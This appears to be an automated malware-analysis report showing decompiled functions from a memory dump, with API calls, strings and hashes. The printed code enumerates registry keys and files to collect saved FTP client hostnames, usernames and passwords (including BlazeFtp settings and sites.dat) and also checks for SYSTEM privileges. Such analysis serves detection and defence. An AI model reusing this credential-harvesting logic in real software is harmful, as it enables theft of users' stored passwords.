Instruction Fuzzy Hash: 1F41B83194011CBBDF226F91CC42BDD7AB5BF04304F1080BAB545750B2DF7A9AA1AF88

Uniqueness

Uniqueness Score: -1.00%

Function 00406FA8, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406FA8(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				long _t56;
				long _t57;

				_t56 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t57 = _t56;
				if(_t57 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
						E004017D5(_t62);
						_v2080 = E00401C8E(_a8, _v2068, "Password", 0);
						_v2084 = E00401C8E(_a8, _v2068, "_Password", 0);
						_v2072 = E00401C8E(_a8, _v2068, "Server", 0);
						_v2076 = E00401C8E(_a8, _v2068, "UserName", 0);
						_v2088 = E00401C8E(_a8, _v2068, "Directory", 0);
						if(_v2080 != 0 || _v2084 != 0) {
							if(_v2072 != 0 && _v2076 != 0) {
								E00401486(_a4, 0xbeef0000);
								E004014E8(_a4, _v2072);
								E004014E8(_a4, _v2076);
								E004014E8(_a4, _v2080);
								E004014E8(_a4, _v2084);
								E004014E8(_a4, _v2088);
							}
						}
						E004017D5(_v2080);
						E004017D5(_v2084);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2088);
						E00406FA8(_a4, _a8, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t57;
			}

0x00406fbb
0x00406fc0
0x00406fc2
0x00406fc8
0x00406fcf
0x00406fcf
0x00406ff6
0x00000000
0x00000000
0x0040701a
0x00407020
0x0040703a
0x00407055
0x00407070
0x0040708b
0x004070a6
0x004070b3
0x004070c5
0x004070d8
0x004070e6
0x004070f4
0x00407102
0x00407110
0x0040711e
0x0040711e
0x004070c5
0x00407129
0x00407134
0x0040713f
0x0040714a
0x00407155
0x00407166
0x00407171
0x00407176
0x00407176
0x00000000
0x00407181
0x00407187

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00406FBB
RegEnumKeyExA.ADVAPI32 ref: 00406FEF
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407181

Strings

Password, xrefs: 00407027
Directory, xrefs: 00407093
Server, xrefs: 0040705D
_Password, xrefs: 00407042
UserName, xrefs: 00407078

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Directory$Password$Server$UserName$_Password
API String ID: 1332880857-3317168126
Opcode ID: e2d51bf07215674384ac8cb268629fa1639a99ba6e32d7d8098cb125b184d393
Instruction ID: 6887f4d4dc4833aea87068e0bfe498b125db7ab105371447aa8d5c49bdf339d4
Opcode Fuzzy Hash: e2d51bf07215674384ac8cb268629fa1639a99ba6e32d7d8098cb125b184d393
Instruction Fuzzy Hash: BA41C33194011CBADF226F51CC42BDCBAB6BF04304F14C0BAB558751B1DB7A5AA2AF98

Uniqueness

Uniqueness Score: -1.00%

Function 00406010, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 112
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406010(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				long _t48;
				long _t49;

				_t48 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
				_t49 = _t48;
				if(_t49 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
						E004017D5(_t54);
						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password", 0);
						_v2072 = E00401C8E( *0x4140fe, _v2068, "HostName", 0);
						_v2084 = E00401C8E( *0x4140fe, _v2068, "Port", 0);
						_v2076 = E00401C8E( *0x4140fe, _v2068, "Username", 0);
						_v2088 = E00401C8E( *0x4140fe, _v2068, "HostDirName", 0);
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E00401486(_a4, 0xbeef0000);
							E004014E8(_a4, _v2072);
							E004014E8(_a4, _v2076);
							E004014E8(_a4, _v2080);
							E004014E8(_a4, _v2084);
							E004014E8(_a4, _v2088);
						}
						E004017D5(_v2080);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2084);
						E004017D5(_v2088);
						E00406010(_a4, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t49;
			}

0x00406026
0x0040602b
0x0040602d
0x00406033
0x0040603a
0x0040603a
0x00406061
0x00000000
0x00000000
0x00406085
0x0040608b
0x004060a8
0x004060c6
0x004060e4
0x00406102
0x00406120
0x0040612d
0x00406149
0x00406157
0x00406165
0x00406173
0x00406181
0x0040618f
0x0040618f
0x0040619a
0x004061a5
0x004061b0
0x004061bb
0x004061c6
0x004061d4
0x004061df
0x004061e4
0x004061e4
0x00000000
0x004061ef
0x004061f5

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00406026
RegEnumKeyExA.ADVAPI32 ref: 0040605A
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004061EF

Strings

HostName, xrefs: 004060B0
Port, xrefs: 004060CE
HostDirName, xrefs: 0040610A
Username, xrefs: 004060EC
Password, xrefs: 00406092

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostDirName$HostName$Password$Port$Username
API String ID: 1332880857-791697221
Opcode ID: a3f99c497edbf23e9725fb0beb3983df1e4c71f2b076d87f637a3e6bb9089809
Instruction ID: 661ca5f8eecc736091142f07f5f5879c64b4d0dd11ba7ceb6d40fcb3e2135ea1
Opcode Fuzzy Hash: a3f99c497edbf23e9725fb0beb3983df1e4c71f2b076d87f637a3e6bb9089809
Instruction Fuzzy Hash: 0D41B53194011CAADF226F92CC42BDC7AB9BF44704F10C0BAB545750B1DB7A5EA2AFD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D625, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 108
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D625(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				long _t46;
				long _t47;

				_t46 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
				_t47 = _t46;
				if(_t47 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2088 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
						E004017D5(_t52);
						_v2068 = E00401C8E( *0x4140fe, _v2088, "Host", 0);
						_v2072 = E00401C8E( *0x4140fe, _v2088, "User", 0);
						_v2076 = E00401C8E( *0x4140fe, _v2088, "Pass", 0);
						_v2080 = E00401C8E( *0x4140fe, _v2088, "Port", 0);
						_v2084 = E00401C8E( *0x4140fe, _v2088, "Remote Dir", 0);
						if(_v2072 != 0) {
							E00401486(_a4, 0xbeef0000);
							E004014E8(_a4, _v2068);
							E004014E8(_a4, _v2072);
							E004014E8(_a4, _v2076);
							E004014E8(_a4, _v2080);
							E004014E8(_a4, _v2084);
						}
						E0040D625(_a4, _v2088);
						E004017D5(_v2088);
						E004017D5(_v2068);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2080);
						E004017D5(_v2084);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t47;
			}

0x0040d63b
0x0040d640
0x0040d642
0x0040d648
0x0040d64f
0x0040d64f
0x0040d676
0x00000000
0x00000000
0x0040d69a
0x0040d6a0
0x0040d6bd
0x0040d6db
0x0040d6f9
0x0040d717
0x0040d735
0x0040d742
0x0040d74c
0x0040d75a
0x0040d768
0x0040d776
0x0040d784
0x0040d792
0x0040d792
0x0040d7a0
0x0040d7ab
0x0040d7b6
0x0040d7c1
0x0040d7cc
0x0040d7d7
0x0040d7e2
0x0040d7e7
0x0040d7e7
0x00000000
0x0040d7f2
0x0040d7f8

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040D63B
RegEnumKeyExA.ADVAPI32 ref: 0040D66F
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D7F2

Strings

Remote Dir, xrefs: 0040D71F
Host, xrefs: 0040D6A7
Port, xrefs: 0040D701
Pass, xrefs: 0040D6E3
User, xrefs: 0040D6C5

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Pass$Port$Remote Dir$User
API String ID: 1332880857-1775099961
Opcode ID: 7e4d7dfb6fa6862afb164c28a87f7e1523254fbf826ab7bb65f3afbeebe2274a
Instruction ID: fa02369c385350f7445e4dbac51c9b2e56b62a742fd5d540ae24488e7f34cbe6
Opcode Fuzzy Hash: 7e4d7dfb6fa6862afb164c28a87f7e1523254fbf826ab7bb65f3afbeebe2274a
Instruction Fuzzy Hash: 7241A931940118BBDF216FA2CD42BDC7AB6BF08704F14C0B6B648754B1DA7A5E91AFD8

Uniqueness

Uniqueness Score: -1.00%

Function 00402B27, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 77
stringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00402B27(void* __eax, void* __edx) {
				void* _v8;
				long _v12;
				void* _v16;
				CHAR* _v20;
				void* _t21;
				int _t26;
				int _t32;
				int _t39;
				void* _t42;

				if( *0x41440d != 0 &&  *0x414415 != 0 &&  *0x414419 != 0) {
					_t42 = 0;
					_t21 = GetCurrentProcess();
					_push( &_v8);
					_push(8);
					_push(_t21);
					if( *0x41440d() != 0) {
						_v12 = 0;
						_t26 = GetTokenInformation(_v8, 1, 0, 0,  &_v12); // executed
						if(_t26 == 0 && GetLastError() == 0x7a && _v12 != 0) {
							_v16 = E004017EC(_v12);
							_t32 = GetTokenInformation(_v8, 1, _v16, _v12,  &_v12); // executed
							if(_t32 != 0) {
								_push( &_v20);
								_push( *_v16);
								if( *0x414419() != 0) {
									_t39 = lstrcmpA(_v20, "S-1-5-18"); // executed
									if(_t39 == 0) {
										_t42 = 1;
									}
									LocalFree(_v20);
								}
							}
							E004017D5(_v16);
						}
						CloseHandle(_v8);
					}
					return _t42;
				} else {
					return 0;
				}
			}

0x00402b3b
0x00402b54
0x00402b56
0x00402b5e
0x00402b5f
0x00402b61
0x00402b6a
0x00402b70
0x00402b84
0x00402b8c
0x00402ba6
0x00402bb8
0x00402bc0
0x00402bca
0x00402bcb
0x00402bd4
0x00402bde
0x00402be5
0x00402be7
0x00402be7
0x00402beb
0x00402beb
0x00402bd4
0x00402bf3
0x00402bf3
0x00402bfb
0x00402bfb
0x00402c04
0x00402b4f
0x00402b53
0x00402b53

APIs

GetCurrentProcess.KERNEL32 ref: 00402B56
GetTokenInformation.KERNELBASE(00410B87,00000001,00000000,00000000,00000000), ref: 00402B84
GetLastError.KERNEL32 ref: 00402B8E
GetTokenInformation.KERNELBASE(00410B87,00000001,?,00000000,00000000,00000000), ref: 00402BB8
lstrcmpA.KERNEL32(?,S-1-5-18,?,?), ref: 00402BDE
LocalFree.KERNEL32(?,?,S-1-5-18,?,?), ref: 00402BEB
CloseHandle.KERNEL32(00410B87), ref: 00402BFB

Strings

S-1-5-18, xrefs: 00402BD6

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InformationToken$CloseCurrentErrorFreeHandleLastLocalProcesslstrcmp
String ID: S-1-5-18
API String ID: 887674703-4289277601
Opcode ID: 042bba242a62f65dbc0e78402b71d5b6602156a4b029cf2b9444344b761daa0e
Instruction ID: 29f45c5e056208b681b019c64babcbd0cb81e3e7f6b38da6c0e7be3b0a9b4890
Opcode Fuzzy Hash: 042bba242a62f65dbc0e78402b71d5b6602156a4b029cf2b9444344b761daa0e
Instruction Fuzzy Hash: D5218331A10209ABDF119FA4DD8ABEE7775BB40308F148576B110B51E1DBB8AA90DB4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C888, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040C888(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t34;
				char* _t49;
				intOrPtr _t53;
				void* _t58;
				char* _t59;

				_t58 = __edx;
				_v8 = E0040150D(_a4, 0x3f, 0);
				_t59 =  *0x414082; // 0x0
				if( *_t59 == 0) {
					L5:
					E0040417C(_a4, "\\BlazeFtp", "site.dat", 0xbeef0000); // executed
					_t34 = E00401C8E( *0x4140fe, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastPassword", 0); // executed
					_v24 = _t34;
					_v16 = E00401C8E( *0x4140fe, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastAddress", 0);
					_v20 = E00401C8E( *0x4140fe, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastUser", 0);
					_v28 = E00401C8E( *0x4140fe, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastPort",  &_v32);
					if(_v16 != 0 && _v20 != 0) {
						_t66 = _v24;
						if(_v24 != 0) {
							E00401486(_a4, 0xbeef0001);
							E004014E8(_a4, _v16);
							E004014E8(_a4, _v20);
							E004014E8(_a4, _v24);
							E004014BC(_a4, _v28, _v32);
						}
					}
					E004017D5(_v24);
					E004017D5(_v16);
					E004017D5(_v20);
					E004017D5(_v28);
					return E00401553(_t58, _t66, _a4, _v8);
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 = StrStrIA(_t59, "BlazeFtp");
					_t61 = _t49;
					if(_t49 != 0) {
						_t53 = E0040234A(_t61, _t59);
						if(_t53 != 0) {
							_v12 = _t53;
							E00404131(_a4, _v12, "site.dat", 0xbeef0000);
							E004017D5(_v12);
						}
					}
					asm("cld");
					asm("repne scasb");
				} while ( *_t59 != 0);
				goto L5;
			}

0x0040c888
0x0040c89b
0x0040c89e
0x0040c8a7
0x0040c8f0
0x0040c902
0x0040c919
0x0040c91e
0x0040c938
0x0040c952
0x0040c96e
0x0040c975
0x0040c97d
0x0040c981
0x0040c98b
0x0040c996
0x0040c9a1
0x0040c9ac
0x0040c9ba
0x0040c9ba
0x0040c981
0x0040c9c2
0x0040c9ca
0x0040c9d2
0x0040c9da
0x0040c9ec
0x00000000
0x00000000
0x00000000
0x0040c8a9
0x0040c8a9
0x0040c8af
0x0040c8b4
0x0040c8b6
0x0040c8be
0x0040c8c0
0x0040c8c2
0x0040c8d5
0x0040c8dd
0x0040c8dd
0x0040c8c0
0x0040c8e2
0x0040c8ea
0x0040c8ec
0x00000000

APIs

StrStrIA.SHLWAPI(00000000,BlazeFtp), ref: 0040C8AF

Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

LastPort, xrefs: 0040C959
LastUser, xrefs: 0040C93D
LastPassword, xrefs: 0040C909
Software\FlashPeak\BlazeFtp\Settings, xrefs: 0040C90E, 0040C928, 0040C942, 0040C95E
BlazeFtp, xrefs: 0040C8A9
LastAddress, xrefs: 0040C923
\BlazeFtp, xrefs: 0040C8FA
site.dat, xrefs: 0040C8CA, 0040C8F5

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: BlazeFtp$LastAddress$LastPassword$LastPort$LastUser$Software\FlashPeak\BlazeFtp\Settings$\BlazeFtp$site.dat
API String ID: 1884169789-2976447346
Opcode ID: 4a01c9c075efc0fe1b0bdcea6bd901eb856120045a53035b5781f9775676293c
Instruction ID: 3013046b71ecd8600bd216ab05a28f2b20a5d622d3359bada96b4353b2a25071
Opcode Fuzzy Hash: 4a01c9c075efc0fe1b0bdcea6bd901eb856120045a53035b5781f9775676293c
Instruction Fuzzy Hash: 55310B71940209FADF126BA2CC86FEE7E72AB84714F20813BB510751F1D7794A919B9C

Uniqueness

Uniqueness Score: -1.00%

Function 00406B7B, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 121
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406B7B(void* __ecx, intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				char _v2088;
				char _v2092;
				long _t48;
				long _t49;
				intOrPtr* _t64;

				_t48 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
				_t49 = _t48;
				if(_t49 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
						E004017D5(_t54);
						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password",  &_v2092);
						_v2072 = E00401C8E( *0x4140fe, _v2068, "Hostname", 0);
						_v2076 = E00401C8E( *0x4140fe, _v2068, "Username", 0);
						_t64 = E00401C8E( *0x4140fe, _v2068, "Port",  &_v2088);
						if(_t64 == 0 || _v2088 != 4) {
							_t65 = _t64;
							if(_t64 != 0) {
								E004017D5(_t65);
							}
							_v2084 = 0x15;
						} else {
							 *_t22 =  *_t64;
							E004017D5(_t64);
						}
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0 && E004041BC(_v2080,  &_v2092, 0) != 0 && _v2092 != 0) {
							E00401486(_a4, 0xbeef0000);
							E004014E8(_a4, _v2072);
							E004014E8(_a4, _v2076);
							E004014BC(_a4, _v2080, _v2092);
							E00401486(_a4, _v2084);
						}
						E004017D5(_v2080);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t49;
			}

0x00406b91
0x00406b96
0x00406b98
0x00406b9e
0x00406ba5
0x00406ba5
0x00406bcc
0x00000000
0x00000000
0x00406bf0
0x00406bf6
0x00406c18
0x00406c36
0x00406c54
0x00406c77
0x00406c79
0x00406c94
0x00406c96
0x00406c99
0x00406c99
0x00406c9e
0x00406c84
0x00406c86
0x00406c8d
0x00406c8d
0x00406caf
0x00406cec
0x00406cfa
0x00406d08
0x00406d1c
0x00406d2a
0x00406d2a
0x00406d35
0x00406d40
0x00406d4b
0x00406d56
0x00406d5b
0x00406d5b
0x00000000
0x00406d66
0x00406d6c

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00406B91
RegEnumKeyExA.ADVAPI32 ref: 00406BC5
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406D66

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

Port, xrefs: 00406C61
Username, xrefs: 00406C3E
Password, xrefs: 00406C02
Hostname, xrefs: 00406C20

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: Hostname$Password$Port$Username
API String ID: 3369285772-1811172798
Opcode ID: 9f7cea86a9d7e4cb23fd6a7f1494058a33729ab209400da08b0670cec60ec65c
Instruction ID: d58266f3bc7653ca31e84fadb1e2cf46137222864ef5a9eb4340578e60140e29
Opcode Fuzzy Hash: 9f7cea86a9d7e4cb23fd6a7f1494058a33729ab209400da08b0670cec60ec65c
Instruction Fuzzy Hash: 7341F67194011CEAEF216F52CC42BDD7AB9BF08304F14C0BAB145750B1EE795EA19F98

Uniqueness

Uniqueness Score: -1.00%

Function 00406947, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 110
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406947(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				char _v2088;
				long _t43;
				long _t44;
				intOrPtr* _t58;

				_t43 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
				_t44 = _t43;
				if(_t44 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
						E004017D5(_t49);
						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password", 0);
						_v2072 = E00401C8E( *0x4140fe, _v2068, "Server", 0);
						_v2076 = E00401C8E( *0x4140fe, _v2068, "Username", 0);
						_t58 = E00401C8E( *0x4140fe, _v2068, "FtpPort",  &_v2088);
						if(_t58 == 0 || _v2088 != 4) {
							_t59 = _t58;
							if(_t58 != 0) {
								E004017D5(_t59);
							}
							_v2084 = 0x15;
						} else {
							 *_t21 =  *_t58;
							E004017D5(_t58);
						}
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E00401486(_a4, 0xbeef0000);
							E004014E8(_a4, _v2072);
							E004014E8(_a4, _v2076);
							E004014E8(_a4, _v2080);
							E00401486(_a4, _v2084);
						}
						E004017D5(_v2080);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t44;
			}

0x0040695d
0x00406962
0x00406964
0x0040696a
0x00406971
0x00406971
0x00406998
0x00000000
0x00000000
0x004069bc
0x004069c2
0x004069df
0x004069fd
0x00406a1b
0x00406a3e
0x00406a40
0x00406a5b
0x00406a5d
0x00406a60
0x00406a60
0x00406a65
0x00406a4b
0x00406a4d
0x00406a54
0x00406a54
0x00406a76
0x00406a92
0x00406aa0
0x00406aae
0x00406abc
0x00406aca
0x00406aca
0x00406ad5
0x00406ae0
0x00406aeb
0x00406af6
0x00406afb
0x00406afb
0x00000000
0x00406b06
0x00406b0c

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040695D
RegEnumKeyExA.ADVAPI32 ref: 00406991
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406B06

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

Server, xrefs: 004069E7
Password, xrefs: 004069C9
FtpPort, xrefs: 00406A28
Username, xrefs: 00406A05

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: FtpPort$Password$Server$Username
API String ID: 3369285772-1828875246
Opcode ID: 54f27ddca477fa0e8bf032fb5598c9cd64d6db72067c8f921924ad2288a971b9
Instruction ID: acd88a8aff8ef73e47380c1a7cd8d89f608d6128b4cd4abc3c603a035cdc8412
Opcode Fuzzy Hash: 54f27ddca477fa0e8bf032fb5598c9cd64d6db72067c8f921924ad2288a971b9
Instruction Fuzzy Hash: 8D413771A4011CFADF22AB62CC42BDD7AB9BF04304F14C0BAB145710B1EE795EA19F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E29C, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 97
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E29C(void* __ecx, void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				unsigned int _v32;
				long _t50;
				long _t51;

				_t50 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
				_t51 = _t50;
				if(_t51 != 0) {
					return _t51;
				}
				_v12 = E00401C8E(_a4, _a8, "Site", 0);
				_v16 = E00401C8E(_a4, _a8, "UserID", 0);
				_v20 = E00401C8E(_a4, _a8, "xflags",  &_v32);
				_v24 = E00401C8E(_a4, _a8, "Port", 0);
				_v28 = E00401C8E(_a4, _a8, "Folder", 0);
				if(_v20 != 0 && _v32 != 0 && E00402A3B(_v20, _v32) != 0) {
					_v32 = _v32 >> 1;
					if(E004041BC(_v20,  &_v32, 0) != 0 && _v12 != 0 && _v16 != 0 && _v20 != 0) {
						E00401486(_a12, 0xbeef0000);
						E004014E8(_a12, _v12);
						E004014E8(_a12, _v16);
						E004014BC(_a12, _v20, _v32);
						E004014E8(_a12, _v24);
						E004014E8(_a12, _v28);
					}
				}
				E004017D5(_v12);
				E004017D5(_v16);
				E004017D5(_v20);
				E004017D5(_v24);
				E004017D5(_v28);
				return RegCloseKey(_v8);
			}

0x0040e2ac
0x0040e2b1
0x0040e2b3
0x0040e3e2
0x0040e3e2
0x0040e2cb
0x0040e2e0
0x0040e2f7
0x0040e30c
0x0040e321
0x0040e328
0x0040e343
0x0040e356
0x0040e372
0x0040e37d
0x0040e388
0x0040e396
0x0040e3a1
0x0040e3ac
0x0040e3ac
0x0040e356
0x0040e3b4
0x0040e3bc
0x0040e3c4
0x0040e3cc
0x0040e3d4
0x00000000

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E2AC
RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?,?,Folder,00000000,?,?,Port,00000000,?,?), ref: 0040E3DC

Part of subcall function 004041BC: LocalFree.KERNEL32(00000000), ref: 0040423C

Part of subcall function 004014E8: lstrlenA.KERNEL32(00000000), ref: 004014F4

Strings

Folder, xrefs: 0040E311
UserID, xrefs: 0040E2D0
Port, xrefs: 0040E2FC
Site, xrefs: 0040E2BB
xflags, xrefs: 0040E2E7

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFreeLocalOpenlstrlen
String ID: Folder$Port$Site$UserID$xflags
API String ID: 2116081971-269738940
Opcode ID: f05f6a50ddf9100c9998efcab0c012a27828d9a3f3488f0900caffbd6122895f
Instruction ID: a4a650a3a6283ae73420e32a9eaac4a284f429e24d6150c9826fb7d835094a75
Opcode Fuzzy Hash: f05f6a50ddf9100c9998efcab0c012a27828d9a3f3488f0900caffbd6122895f
Instruction Fuzzy Hash: 3631673195010ABBDF126F92CC46BEE7B72AF04344F10847ABA21751F1D77A8A61EB58

Uniqueness

Uniqueness Score: -1.00%

Function 004076F4, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 89
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004076F4(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				long _t39;
				long _t40;

				_t39 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t40 = _t39;
				if(_t40 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
						E004017D5(_t45);
						_v2072 = E00401C8E(_a8, _v2068, "InstallPath", 0);
						_v2076 = E00401C8E(_a8, _v2068, "DataDir", 0);
						if(_v2072 != 0) {
							E00404131(_a4, _v2072, "sites.dat", 0xbeef0000);
							E00404131(_a4, _v2072, "sites.ini", 0xbeef0001);
						}
						if(_v2076 != 0) {
							E00404131(_a4, _v2076, "sites.dat", 0xbeef0000);
							E00404131(_a4, _v2076, "sites.ini", 0xbeef0001);
						}
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004076F4(_a4, _a8, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t40;
			}

0x00407707
0x0040770c
